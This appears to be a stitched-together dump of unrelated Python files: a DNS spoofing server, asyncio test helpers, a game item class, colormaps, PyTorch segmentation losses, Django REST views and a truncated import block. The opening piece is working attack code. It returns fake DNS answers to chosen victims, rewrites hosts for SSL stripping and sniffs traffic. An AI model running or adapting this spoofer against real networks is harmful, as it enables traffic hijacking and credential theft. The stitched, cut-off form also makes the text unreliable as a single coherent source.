rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, dominios[dominio])
resp.answer.append(rrset)
return resp, dosleep
global ips
ips = respuestas(qname.lower(), 'A')
if qname.lower() not in spoof and isinstance(ips, numbers.Integral):
# SSLSTRIP2 transformation
host2 = ''
for from_host in transformation.keys():
if host.startswith(from_host):
host2 = transformation[from_host]+host.split(from_host)[1]
break
if host2 != '':
DEBUGLOG('SSLStrip transforming host: %s => %s ...' % (host, host2))
ips = respuestas(host2, 'A')
#print '>>> Victim: %s Answer 0: %s'%(prov_ip,prov_resp)
if isinstance(ips, numbers.Integral):
DEBUGLOG('No host....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
return resp, dosleep
prov_resp = ips[0]
consultas[prov_ip] = prov_resp
ttl = 1
if (host not in nospoof) and (prov_ip not in nospoofto) and (len(victims) == 0 or prov_ip in victims):
if host in spoof:
save_req(LOGREQFILE, '!!! Specific host (' + host + ') asked....\n')
for spoof_ip in spoof[host].split(","):
DEBUGLOG('Adding fake IP = ' + spoof_ip)
rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof_ip)
resp.answer.append(rrset)
return resp, dosleep
elif Forward:
consultas[prov_ip] = prov_resp
#print 'DEBUG: Adding consultas[%s]=%s'%(prov_ip,prov_resp)
if ip1 is not None:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip1)
DEBUGLOG('Adding fake IP = ' + ip1)
resp.answer.append(rrset)
if ip2 is not None:
#Sleep only when using global resquest matrix
dosleep = True
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, ip2)
DEBUGLOG('Adding fake IP = ' + ip2)
resp.answer.append(rrset)
if len(fake_ips)>0:
for fip in fake_ips:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
DEBUGLOG('Adding fake IP = ' + fip)
resp.answer.append(rrset)
if not Forward and prov_ip not in nospoofto:
if len(fake_ips) == 0:
DEBUGLOG('No forwarding....')
resp = make_response(qry=msg, RCODE=3) # RCODE = 3 NXDOMAIN
elif len(fake_ips) > 0:
DEBUGLOG('No forwarding (but adding fake IPs)...')
for fip in fake_ips:
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, fip)
DEBUGLOG('Adding fake IP = ' + fip)
resp.answer.append(rrset)
return resp, dosleep
global realip
for realip in ips:
DEBUGLOG('Adding real IP = ' + realip.to_text())
# save_req(" " + "realip.to_text()"+"\n")
rrset = dns.rrset.from_text(q.name, ttl, dns.rdataclass.IN, dns.rdatatype.A, realip.to_text())
resp.answer.append(rrset)
return resp, dosleep
# def std_A2_qry(msg):
# qs = msg.question
# DEBUGLOG(str(len(qs)) + ' questions.')
# iparpa = qs[0].to_text().split(' ',1)[0]
# print 'Host: '+ iparpa
# resp = make_response(qry=msg)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4')
# resp.answer.append(rrset)
# return resp
def std_ASPOOF_qry(msg):
global spoof
qs = msg.question
DEBUGLOG(str(len(qs)) + ' questions.')
iparpa = qs[0].to_text().split(' ', 1)[0]
DEBUGLOG('Host: ' + iparpa)
resp = make_response(qry=msg)
for q in qs:
qname = q.name.to_text()[:-1]
DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname]
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.')
# resp.answer.append(rrset)
# rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.')
# resp.answer.append(rrset)
rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname])
resp.answer.append(rrset)
return resp
def make_response(qry=None, id=None, RCODE=0):
if qry is None and id is None:
raise Exception, 'bad use of make_response'
if qry is None:
resp = dns.message.Message(id)
# QR = 1
resp.flags |= dns.flags.QR
if RCODE != 1:
raise Exception, 'bad use of make_response'
else:
resp = dns.message.make_response(qry)
resp.flags |= dns.flags.AA
resp.flags |= dns.flags.RA
resp.set_rcode(RCODE)
return resp
process_files()
Resolver.reset()
Resolver.read_resolv_conf(RESOLVCONF)
signal.signal(signal.SIGUSR1, SIGUSR1_handle)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 53))
if Forward:
DEBUGLOG('DNS Forwarding activado....')
else:
DEBUGLOG('DNS Forwarding desactivado....')
DEBUGLOG('binded to UDP port 53.')
serving_ids = []
noserv = True
if ip1 is not None and ip2 is not None and Forward:
sniff = ThreadSniffer()
sniff.start()
while True:
if noserv:
DEBUGLOG('waiting requests.')
try:
message, address = s.recvfrom(1024)
noserv = True
except socket.error as (code, msg):
if code != errno.EINTR:
raise
if noserv:
DEBUGLOG('serving a request.')
requestHandler(address, message)
|
import asyncio
import functools
def futurized(o):
''' Makes the given object to be awaitable.
:param any o: Object to wrap
:return: awaitable that resolves to provided object
:rtype: asyncio.Future
Anything passed to :code:`futurized` is wrapped in :code:`asyncio.Future`.
This makes it awaitable (can be run with :code:`await` or :code:`yield from`) as
a result of await it returns the original object.
If provided object is a Exception (or its sublcass) then the `Future` will raise it on await.
.. code-block:: python
fut = aiounittest.futurized('SOME TEXT')
ret = await fut
print(ret) # prints SOME TEXT
fut = aiounittest.futurized(Exception('Dummy error'))
ret = await fut # will raise the exception "dummy error"
The main goal is to use it with :code:`unittest.mock.Mock` (or :code:`MagicMock`) to
be able to mock awaitable functions (coroutines).
Consider the below code
.. code-block:: python
from asyncio import sleep
async def add(x, y):
await sleep(666)
return x + y
You rather don't want to wait 666 seconds, you've gotta mock that.
.. code-block:: python
from aiounittest import futurized, AsyncTestCase
from unittest.mock import Mock, patch
import dummy_math
class MyAddTest(AsyncTestCase):
async def test_add(self):
mock_sleep = Mock(return_value=futurized('whatever'))
patch('dummy_math.sleep', mock_sleep).start()
ret = await dummy_math.add(5, 6)
self.assertEqual(ret, 11)
mock_sleep.assert_called_once_with(666)
async def test_fail(self):
mock_sleep = Mock(return_value=futurized(Exception('whatever')))
patch('dummy_math.sleep', mock_sleep).start()
with self.assertRaises(Exception) as e:
await dummy_math.add(5, 6)
mock_sleep.assert_called_once_with(666)
'''
f = asyncio.Future()
if isinstance(o, Exception):
f.set_exception(o)
else:
f.set_result(o)
return f
def run_sync(func=None, loop=None):
''' Runs synchonously given function (coroutine)
:param callable func: function to run (mostly coroutine)
:param ioloop loop: event loop to use to run `func`
:type loop: event loop of None
By default the brand new event loop will be created (old closed). After completion, the loop will be closed and then recreated, set as default,
leaving asyncio clean.
**Note**: :code:`aiounittest.async_test` is an alias of :code:`aiounittest.helpers.run_sync`
Function can be used like a `pytest.mark.asyncio` (implemetation differs),
but it's compatible with :code:`unittest.TestCase` class.
.. code-block:: python
import asyncio
import unittest
from aiounittest import async_test
async def add(x, y):
await asyncio.sleep(0.1)
return x + y
class MyAsyncTestDecorator(unittest.TestCase):
@async_test
async def test_async_add(self):
ret = await add(5, 6)
self.assertEqual(ret, 11)
.. note::
If the loop is provided, it won't be closed. It's up to you.
This function is also used internally by :code:`aiounittest.AsyncTestCase` to run coroutines.
'''
def get_brand_new_default_event_loop():
old_loop = asyncio.get_event_loop()
if not old_loop.is_closed():
old_loop.close()
_loop = asyncio.new_event_loop()
asyncio.set_event_loop(_loop)
return _loop
def decorator(f):
@functools.wraps(f)
def wrapper(*args, **kwargs):
nonlocal loop
use_default_event_loop = loop is None
if use_default_event_loop:
loop = get_brand_new_default_event_loop()
try:
ret = f(*args, **kwargs)
future = asyncio.ensure_future(ret, loop=loop)
return loop.run_until_complete(future)
finally:
if use_default_event_loop:
# clean up
loop.close()
del loop
# again set a new (unstopped) event loop
get_brand_new_default_event_loop()
return wrapper
if func is None:
return decorator
else:
return decorator(func)
async_test = run_sync
|
from items.Item import Item, Cool_Down_Item
from items.Amplifying_Tome import Amplifying_Tome
class Fiendish_Codex(Item, Cool_Down_Item):
def __init__(self):
Item.__init__(self, name='Fiendish Codex', code=3108, cost=900, sell=630)
self.sub_items = [Amplifying_Tome()]
def stats(self, champ):
champ.ap_dmg += 30
self.decrease_cooldown(champ, 0.1)
return "%s ap damge increase %d, cooldown decrease %d" % (champ.name, 30, 10) + '%'
def remove_stats(self, champ):
champ.ap_dmg -= 30
self.increase_cooldown(champ, 0.1)
return "%s ap damge decrease %d, cooldown increase %d" % (champ.name, 30, 10) + '%'
|
class SingletonMeta(type):
def __getattr__(cls, name):
return (super() if name == "INSTANCE" else cls.INSTANCE).__getattribute__(name)
def __setattr__(cls, name, value):
(super() if name == "INSTANCE" else cls.INSTANCE).__setattr__(name, value)
class Singleton(metaclass = SingletonMeta):
def __init__(self):
if hasattr(self.__class__, "INSTANCE"):
raise ValueError(f"Only one instance of {self.__class__} can be created")
self.__class__.INSTANCE = self
class Global(Singleton):
pass
Global()
|
import plt_tools
import numpy as _np
def clouds():
bmax = plt_tools.colors.Color((0 ,0 ,0.1))
bmin = plt_tools.colors.Color((0 ,0 ,1))
colors = _np.array([bmin.rgb , bmax.rgb])
cmap = plt_tools.colormap.creat_cmap(colors=colors, norm = 'linear',
log_min= 0.1,
reverse=False)
cmap.set_bad((1 ,1 ,1))
return cmap
def temperature(limit_to = None):
"""use slice() for limit_to"""
brutal_heat = plt_tools.colors.Color((191 ,19 ,0), color_scale=255, model='rgb')
# hot = plt_tools.colors.Color((255,112,3), color_scale= 255, model='rgb')
warm = plt_tools.colors.Color((255 ,255 ,92), color_scale= 255, model='rgb')
moderate = plt_tools.colors.Color((41 ,153 ,41), color_scale= 255, model='rgb')
cold = plt_tools.colors.Color((23 ,16 ,158), color_scale= 255, model='rgb')
freezing = plt_tools.colors.Color((246 ,207 ,255), color_scale= 255, model='rgb')
colors = _np.array([freezing.rgb, cold.rgb, moderate.rgb, warm.rgb, brutal_heat.rgb])
if limit_to:
colors = colors[limit_to]
cmap = plt_tools.colormap.creat_cmap(colors=colors, norm = 'linear',
log_min= 0.1,
reverse=False)
cmap.set_bad((1 ,1 ,1))
return cmap
def relative_humidity(limit_to = None, reverse = False):
"""use slice() for limit_to"""
bone_dry = plt_tools.colors.Color((255 ,255 ,196), color_scale=255, model='rgb')
dry = plt_tools.colors.Color((227 ,200 ,82), color_scale= 255, model='rgb')
nice = plt_tools.colors.Color((191 ,93 ,20), color_scale= 255, model='rgb')
wet = plt_tools.colors.Color((41 ,153 ,41), color_scale= 255, model='rgb')
wet.brightness = 0.5
wet.saturation = 0.7
dripping = plt_tools.colors.Color((23 ,16 ,158), color_scale= 255, model='rgb')
# freezing = plt_tools.colors.Color((246,207,255), color_scale= 255, model='rgb')
colors = _np.array([bone_dry.rgb,
# dry.rgb,
nice.rgb, wet.rgb, dripping.rgb])
if limit_to:
colors = colors[limit_to]
cmap = plt_tools.colormap.creat_cmap(colors=colors, norm = 'linear',
log_min= 0.1,
reverse=reverse)
cmap.set_bad((1 ,1 ,1))
return cmap
def particle_concentration(limit_to = None):
"""use slice() for limit_to"""
venus = plt_tools.colors.Color((138 ,59 ,0), color_scale=255, model='rgb')
venus.brightness *= 0.1
unhealthy = plt_tools.colors.Color((191 ,19 ,0), color_scale=255, model='rgb')
# hot = plt_tools.colors.Color((255,112,3), color_scale= 255, model='rgb')
moderate = plt_tools.colors.Color((255 ,255 ,92), color_scale= 255, model='rgb')
# moderate = plt_tools.colors.Color((41,153,41), color_scale= 255, model='rgb')
# cold = plt_tools.colors.Color((23,16,158), color_scale= 255, model='rgb')
clean = plt_tools.colors.Color((246 ,207 ,255), color_scale= 255, model='rgb')
clean.hue -= 0.2
colors = _np.array([clean.rgb, moderate.rgb, unhealthy.rgb, venus.rgb])
if limit_to:
colors = colors[limit_to]
cmap = plt_tools.colormap.creat_cmap(colors=colors, norm = 'linear',
log_min= 0.1,
reverse=False)
cmap.set_bad((1 ,1 ,1))
return cmap |
from api.models.attachments import Attachment # noqa: F401
from api.models.platform_settings import PlatformPost # noqa: F401
from api.models.publications import Publication # noqa: F401
|
from __future__ import generator_stop
from typing import Tuple
from genutility.fileformats.srt import MalformedFile, SRTFile
from plug import Filetypes
@Filetypes.plugin(["srt"])
class SRT(object):
def __init__(self):
pass
def validate(self, path, ext):
# type: (str, str) -> Tuple[int, str]
try:
with SRTFile(path, "r") as fr:
for sub in fr:
pass
return (0, "")
except AssertionError as e:
return (1, str(e))
except MalformedFile as e:
return (1, str(e))
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: Donny You(youansheng@gmail.com)
# Loss function for Semantic Segmentation.
import torch
import torch.nn as nn
import torch.nn.functional as F
class FSCELoss(nn.Module):
def __init__(self, configer=None):
super(FSCELoss, self).__init__()
self.configer = configer
weight = None
if self.configer.exists('loss', 'params') and 'ce_weight' in self.configer.get('loss', 'params'):
weight = self.configer.get('loss', 'params')['ce_weight']
weight = torch.FloatTensor(weight).cuda()
reduction = 'elementwise_mean'
if self.configer.exists('loss', 'params') and 'ce_reduction' in self.configer.get('loss', 'params'):
reduction = self.configer.get('loss', 'params')['ce_reduction']
ignore_index = -100
if self.configer.exists('loss', 'params') and 'ce_ignore_index' in self.configer.get('loss', 'params'):
ignore_index = self.configer.get('loss', 'params')['ce_ignore_index']
self.ce_loss = nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction=reduction)
def forward(self, inputs, *targets, weights=None, **kwargs):
loss = 0.0
if isinstance(inputs, list):
if weights is None:
weights = [1.0] * len(inputs)
for i in range(len(inputs)):
if len(targets) > 1:
target = self._scale_target(targets[i], (inputs[i].size(2), inputs[i].size(3)))
loss += weights[i] * self.ce_loss(inputs[i], target)
else:
target = self._scale_target(targets[0], (inputs[i].size(2), inputs[i].size(3)))
loss += weights[i] * self.ce_loss(inputs[i], target)
else:
target = self._scale_target(targets[0], (inputs.size(2), inputs.size(3)))
loss = self.ce_loss(inputs, target)
return loss
@staticmethod
def _scale_target(targets_, scaled_size):
targets = targets_.clone().unsqueeze(1).float()
targets = F.interpolate(targets, size=scaled_size, mode='nearest')
return targets.squeeze(1).long()
class FSOhemCELoss(nn.Module):
def __init__(self, configer):
super(FSOhemCELoss, self).__init__()
self.configer = configer
self.thresh = self.configer.get('loss', 'params')['ohem_thresh']
self.min_kept = max(1, self.configer.get('loss', 'params')['ohem_minkeep'])
weight = None
if self.configer.exists('loss', 'params') and 'ce_weight' in self.configer.get('loss', 'params'):
weight = self.configer.get('loss', 'params')['ce_weight']
weight = torch.FloatTensor(weight).cuda()
self.reduction = 'mean'
if self.configer.exists('loss', 'params') and 'ce_reduction' in self.configer.get('loss', 'params'):
self.reduction = self.configer.get('loss', 'params')['ce_reduction']
ignore_index = -100
if self.configer.exists('loss', 'params') and 'ce_ignore_index' in self.configer.get('loss', 'params'):
ignore_index = self.configer.get('loss', 'params')['ce_ignore_index']
self.ignore_label = ignore_index
self.ce_loss = nn.CrossEntropyLoss(weight=weight, ignore_index=ignore_index, reduction='none')
def forward(self, predict, target, **kwargs):
"""
Args:
predict:(n, c, h, w)
target:(n, h, w)
weight (Tensor, optional): a manual rescaling weight given to each class.
If given, has to be a Tensor of size "nclasses"
"""
prob_out = F.softmax(predict, dim=1)
tmp_target = target.clone()
tmp_target[tmp_target == self.ignore_label] = 0
prob = prob_out.gather(1, tmp_target.unsqueeze(1))
mask = target.contiguous().view(-1, ) != self.ignore_label
sort_prob, sort_indices = prob.contiguous().view(-1, )[mask].contiguous().sort()
min_threshold = sort_prob[min(self.min_kept, sort_prob.numel() - 1)] if sort_prob.numel() > 0 else 0.0
threshold = max(min_threshold, self.thresh)
loss_matirx = self.ce_loss(predict, target).contiguous().view(-1, )
sort_loss_matirx = loss_matirx[mask][sort_indices]
select_loss_matrix = sort_loss_matirx[sort_prob < threshold]
if self.reduction == 'sum' or select_loss_matrix.numel() == 0:
return select_loss_matrix.sum()
elif self.reduction == 'mean':
return select_loss_matrix.mean()
else:
raise NotImplementedError('Reduction Error!')
class FSAuxOhemCELoss(nn.Module):
def __init__(self, configer=None):
super(FSAuxOhemCELoss, self).__init__()
self.configer = configer
self.ce_loss = FSCELoss(self.configer)
self.ohem_ce_loss = FSOhemCELoss(self.configer)
def forward(self, inputs, targets, **kwargs):
aux_out, seg_out = inputs
seg_loss = self.ohem_ce_loss(seg_out, targets)
aux_targets = self._scale_target(targets, (aux_out.size(2), aux_out.size(3)))
aux_loss = self.ce_loss(aux_out, aux_targets)
loss = self.configer.get('loss', 'loss_weights')['seg_loss'] * seg_loss
loss = loss + self.configer.get('loss', 'loss_weights')['aux_loss'] * aux_loss
return loss
@staticmethod
def _scale_target(targets_, scaled_size):
targets = targets_.clone().unsqueeze(1).float()
targets = F.interpolate(targets, size=scaled_size, mode='nearest')
return targets.squeeze(1).long()
class FSAuxCELoss(nn.Module):
def __init__(self, configer=None):
super(FSAuxCELoss, self).__init__()
self.configer = configer
self.ce_loss = FSCELoss(self.configer)
def forward(self, inputs, targets, **kwargs):
aux_out, seg_out = inputs
seg_loss = self.ce_loss(seg_out, targets)
aux_targets = self._scale_target(targets, (aux_out.size(2), aux_out.size(3)))
aux_loss = self.ce_loss(aux_out, aux_targets)
loss = self.configer.get('loss', 'loss_weights')['seg_loss'] * seg_loss
loss = loss + self.configer.get('loss', 'loss_weights')['aux_loss'] * aux_loss
return loss
@staticmethod
def _scale_target(targets_, scaled_size):
targets = targets_.clone().unsqueeze(1).float()
targets = F.interpolate(targets, size=scaled_size, mode='nearest')
return targets.squeeze(1).long()
class FSAuxEncCELoss(nn.Module):
def __init__(self, configer=None):
super(FSAuxEncCELoss, self).__init__()
self.configer = configer
self.ce_loss = FSCELoss(self.configer)
self.se_loss = FSEncLoss(self.configer)
def forward(self, outputs, targets, **kwargs):
aux_out, enc_out, seg_out = outputs
seg_loss = self.ce_loss(seg_out, targets)
aux_targets = self._scale_target(targets, (aux_out.size(2), aux_out.size(3)))
aux_loss = self.ce_loss(aux_out, aux_targets)
loss = self.configer.get('loss', 'loss_weights')['seg_loss'] * seg_loss
loss = loss + self.configer.get('loss', 'loss_weights')['aux_loss'] * aux_loss
enc_loss = self.enc_loss(enc_out, aux_targets, self.configer.get('loss', 'enc_size'))
loss = loss + self.configer.get('loss', 'loss_weights')['enc_loss'] * enc_loss
return loss
@staticmethod
def _scale_target(targets_, scaled_size):
targets = targets_.clone().unsqueeze(1).float()
targets = F.interpolate(targets, size=scaled_size, mode='nearest')
return targets.squeeze(1).long()
class FSFocalLoss(nn.Module):
def __init__(self, configer):
super(FSFocalLoss, self).__init__()
self.configer = configer
def forward(self, output, target, **kwargs):
self.y = self.configer.get('focal_loss', 'y')
P = F.softmax(output)
f_out = F.log_softmax(output)
Pt = P.gather(1, torch.unsqueeze(target, 1))
focus_p = torch.pow(1 - Pt, self.y)
alpha = 0.25
nll_feature = -f_out.gather(1, torch.unsqueeze(target, 1))
weight_nll = alpha * focus_p * nll_feature
loss = weight_nll.mean()
return loss
class FSEncLoss(nn.Module):
def __init__(self, configer):
super(FSEncLoss, self).__init__()
self.configer = configer
weight = None
if self.configer.exists('loss', 'params') and 'enc_weight' in self.configer.get('loss', 'params'):
weight = self.configer.get('loss', 'params')['enc_weight']
weight = torch.FloatTensor(weight).cuda()
reduction = 'elementwise_mean'
if self.configer.exists('loss', 'params') and 'enc_reduction' in self.configer.get('loss', 'params'):
reduction = self.configer.get('loss', 'params')['enc_reduction']
self.bce_loss = nn.BCELoss(weight, reduction=reduction)
def forward(self, preds, targets, grid_size=None, **kwargs):
if len(targets.size()) == 2:
return self.bce_loss(F.sigmoid(preds), targets)
se_target = self._get_batch_label_vector(targets,
self.configer.get('data', 'num_classes'),
grid_size).type_as(preds)
return self.bce_loss(F.sigmoid(preds), se_target)
@staticmethod
def _get_batch_label_vector(target_, num_classes, grid_size=None):
# target is a 3D Variable BxHxW, output is 2D BxnClass
b, h, w = target_.size()
pad_h = 0 if (h % grid_size == 0) else grid_size - (h % grid_size)
pad_w = 0 if (w % grid_size == 0) else grid_size - (w % grid_size)
target = target_.clone()
target = F.pad(target, (0, pad_w, 0, pad_h), "constant", num_classes)
b, h, w = target.size()
if grid_size is not None:
target = target.contiguous().view(b, h // grid_size, grid_size, w // grid_size, grid_size)
target = target.permute(0, 1, 3, 2, 4).contiguous().view(b * h * w // (grid_size ** 2),
grid_size, grid_size)
batch = target.size(0)
tvect = torch.zeros(batch, num_classes)
for i in range(batch):
hist = torch.histc(target[i].cpu().data.float(),
bins=num_classes, min=0, max=num_classes - 1)
vect = hist>0
tvect[i] = vect
return tvect
class FSEmbedLoss(nn.Module):
def __init__(self, configer):
super(FSEmbedLoss, self).__init__()
self.num_classes = configer.get('data', 'num_classes')
self.cosine_loss = nn.CosineEmbeddingLoss()
def forward(self, inputs, targets, **kwargs):
inputs = inputs.transpose(0, 1)
center_array = torch.zeros((self.num_classes, inputs.size()[0]), requires_grad=True).cuda()
sim_loss = torch.Tensor([0.0]).cuda()
sim_loss.requires_grad = True
mask_list = list()
for i in range(self.num_classes):
mask = self.get_mask(targets, i).unsqueeze(0)
sum_pixel = max(mask.sum(), 1)
# print sum_pixel
mask = mask.contiguous().repeat(inputs.size()[0], 1, 1, 1).byte().cuda()
sim_input = inputs[mask]
if sim_input.numel() == 0:
mask_list.append(i)
continue
sim_input = sim_input.contiguous().view(inputs.size()[0], -1)
center = torch.sum(sim_input, 1, keepdim=False)
center = center / sum_pixel
center_array[i, :] = center
sim_input = sim_input.permute(1, 0)
sim_label = torch.ones(sim_input.size()[0], ).float().cuda()
sim_center = center.contiguous().view(1, -1).repeat(sim_input.size()[0], 1)
sim_loss = sim_loss + self.cosine_loss(sim_center, sim_input, sim_label)
diff_loss = torch.Tensor([0.0]).cuda()
diff_loss.requires_grad = True
for i in range(self.num_classes):
if i in mask_list:
continue
label = torch.zeros(self.num_classes, ).float().cuda()
center_dual = torch.zeros((self.num_classes, inputs.size()[0]), requires_grad=True).cuda()
for k in range(self.num_classes):
center_dual[k] = center_array[i]
for j in range(self.num_classes):
if j == i:
label[j] = 1
else:
label[j] = -1
diff_loss = diff_loss + self.cosine_loss(center_array, center_dual, label)
embedding_loss = diff_loss + sim_loss
# print embedding_loss.requires_grad
return embedding_loss
def get_mask(self, targets, i):
targets_cp = torch.cuda.FloatTensor(targets.size())
targets_cp.copy_(targets.data)
if i == 0:
targets_cp[targets_cp != 0] = 2
targets_cp[targets_cp == 0] = 1
targets_cp[targets_cp == 2] = 0
else:
targets_cp[targets_cp != i] = 0
targets_cp[targets_cp == i] = 1
return targets_cp
if __name__ == "__main__":
inputs = torch.ones((3, 5, 6, 6)).cuda()
targets = torch.ones((3, 6, 6)).cuda()
|
# Crowdsrc imports
from crowdsrc.src.models import *
from crowdsrc.src.serializers import *
from crowdsrc.settings import CREATE, DELETE
from .views import *
# Django imports
from django.db.models import Count, Prefetch
from rest_framework.generics import GenericAPIView, ListAPIView, UpdateAPIView
from rest_framework.mixins import CreateModelMixin, DestroyModelMixin
from rest_framework.status import HTTP_200_OK, HTTP_201_CREATED, HTTP_204_NO_CONTENT, HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from rest_framework.viewsets import ModelViewSet
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticatedOrReadOnly
from rest_framework.filters import SearchFilter
class ProjectMessageView(ListAPIView):
queryset = TeamMessage.objects.all()
serializer_class = TeamMessageGETSerializer
# Gets a list of team messages for the given project
#
# Does not return messages written by users that are blocking the
# requester, or by users that the requester has blocked.
def list(self, request, id=None):
# Filter messages written by users that are blocking the requester
blockers = BlockedUser.objects.filter(
target_id=request.user.id).values('source_id')
queryset = self.queryset.filter(
project_id=id).exclude(user_id__in=blockers)
# Filter messages written by users that the requester is blocking
blocking = BlockedUser.objects.filter(
source_id=request.user.id).values('target_id')
queryset = queryset.exclude(user_id__in=blocking)
serializer = self.serializer_class(queryset, many=True)
return Response(serializer.data, status=HTTP_200_OK)
class ProjectTaskView(ListAPIView):
queryset = Task.objects.all()
serializer_class = TaskGETSerializer
# Gets a list of tasks for the specified project id
def list(self, request, id=None):
serializer = self.serializer_class(self.queryset.filter(project_id=id), many=True,
context={'requester_id': request.user.id})
return Response(serializer.data, status=HTTP_200_OK)
class ProjectViewSet(ModelViewSet):
queryset = Project.objects.all()
serializer_class = ProjectListGETSerializer
permission_classes = (IsAuthenticatedOrReadOnly,)
filter_backends = (SearchFilter,)
search_fields = ('title', 'description', 'website', 'categories__category__name',
'tasks__skills__skill__name')
def get_serializer_class(self):
if self.request.method in ('POST', 'PUT', 'PATCH'):
return ProjectPOSTSerializer
else:
return self.serializer_class
# Retrieves a project by ID
def retrieve(self, request, pk=None):
project = Project.objects.get(id=pk)
# Get 5 skills that appear in the most tasks on this project
top_skills = TaskSkill.objects.filter(task__project_id=pk).values('skill').order_by('skill').annotate(
skill_count=Count('skill')).order_by('-skill_count').values_list('skill__name', 'skill_count').distinct()[:5]
serializer = ProjectDetailedGETSerializer(
project, context=self.get_serializer_context())
output = dict(serializer.data)
output['skills'] = top_skills
return Response(output, status=HTTP_200_OK,
headers=self.get_success_headers(serializer.data))
# Updates a project iff the requesting user is the user that created
# the project.
def partial_update(self, request, pk=None):
instance = self.queryset.get(id=pk)
# Check auth token before performing the action
if instance.user_id != request.user.id:
return Response(status=HTTP_401_UNAUTHORIZED)
request.data['last_updated'] = timezone.now()
serializer = ProjectPOSTSerializer(
self.queryset.get(id=pk), data=request.data, partial=True)
if serializer.is_valid():
serializer.save()
log_event(request, instance, self.queryset.get(id=pk), UPDATE)
return Response(ProjectDetailedGETSerializer(self.queryset.get(id=pk)).data, status=HTTP_200_OK)
return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)
# Creates a new project if the requesting user is authenticated
def create(self, request, *args, **kwargs):
category_data = request.data.pop('categories')
task_data = request.data.pop('tasks')
request.data['user'] = request.user.id
serializer = ProjectPOSTSerializer(data=request.data)
if serializer.is_valid():
serializer.save()
instance = self.queryset.get(id=serializer.data.get('id'))
log_event(request, None, instance, CREATE)
# Create project categories objects
for category_name in category_data:
if not category_name or category_name.isspace():
continue
category, _ = Category.objects.get_or_create(
name=category_name)
category_serializer = ProjectCategoryPOSTSerializer(
data={'project': instance.id, 'category': category.id})
if category_serializer.is_valid():
category_serializer.save()
log_event(request, None, ProjectCategory.objects.get(
id=category_serializer.data.get('id')), CREATE)
# Create task objects
for task in task_data:
skill_data = task.pop('skills')
task_serializer = TaskPOSTSerializer(
data={'project': instance.id, 'title': task.get('title'), 'description': task.get('description')})
if task_serializer.is_valid():
task_serializer.save()
task = Task.objects.get(id=task_serializer.data.get('id'))
log_event(request, None, task, CREATE)
# Create task skill objects
for skill_name in skill_data:
if not skill_name or skill_name.isspace():
continue
skill, _ = Skill.objects.get_or_create(name=skill_name)
skill_serializer = TaskSkillPOSTSerializer(
data={'task': task.id, 'skill': skill.id})
if skill_serializer.is_valid():
skill_serializer.save()
log_event(request, None, TaskSkill.objects.get(
id=skill_serializer.data.get('id')), CREATE)
return Response(serializer.data, status=HTTP_201_CREATED,
headers=self.get_success_headers(serializer.data))
return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)
class ProjectCategoryView(GenericAPIView, CreateModelMixin, DestroyModelMixin):
queryset = ProjectCategory.objects.all()
serializer_class = ProjectCategoryPOSTSerializer
def post(self, request, project_id=None, category_name=None, *args, **kwargs):
try:
project = Project.objects.get(id=project_id)
if project.user_id != request.user.id:
raise ValueError('Must be project creator')
except ValueError:
return Response(status=HTTP_401_UNAUTHORIZED)
except:
return Response(status=HTTP_400_BAD_REQUEST)
if category_name.isspace() or not category_name:
return Response('Category cannot be whitespace', status=HTTP_400_BAD_REQUEST)
category, _ = Category.objects.get_or_create(name=category_name)
serializer = self.serializer_class(data={'project': project_id,
'category': category.id})
if serializer.is_valid():
serializer.save()
log_event(request, None, self.queryset.get(
id=serializer.data.get('id')), CREATE)
return Response(CategorySerializer(category).data, status=HTTP_201_CREATED)
return Response(serializer.errors, status=HTTP_400_BAD_REQUEST)
def delete(self, request, project_id=None, category_name=None, *args, **kwargs):
try:
instance = ProjectCategory.objects.get(
project_id=project_id, category__name=category_name)
if instance.project.user_id != request.user.id:
raise ValueError('Must be project creator')
except ValueError:
return Response(status=HTTP_401_UNAUTHORIZED)
except:
return Response(status=HTTP_400_BAD_REQUEST)
log_event(request, instance, None, DELETE)
instance.delete()
return Response(status=HTTP_204_NO_CONTENT)
|
import logging
from dataclasses import dataclass
from pathlib import PurePath
from pants.core.goals.package import BuiltPackage, BuiltPackageArtifact
from pants.core.util_rules.external_tool import (DownloadedExternalTool,
ExternalToolRequest)
from pants.core.util_rules.source_files import SourceFiles, SourceFilesRequest
from pants.core.util_rules.stripped_source_files import StrippedSourceFiles
from pants.engine.environment import Environment, EnvironmentRequest
from pants.engine.fs import (AddPrefix, Digest, FileContent, MergeDigests,
PathGlobs, RemovePrefix, Snapshot)
from pants.engine.platform import Platform
from pants.engine.process import (BinaryPathRequest, BinaryPaths, Process,
ProcessResult)
from pants.engine.rules import Get, MultiGet, collect_rules, rule
from pants.engine.target import (Target, TransitiveTargets,
TransitiveTargetsRequest)
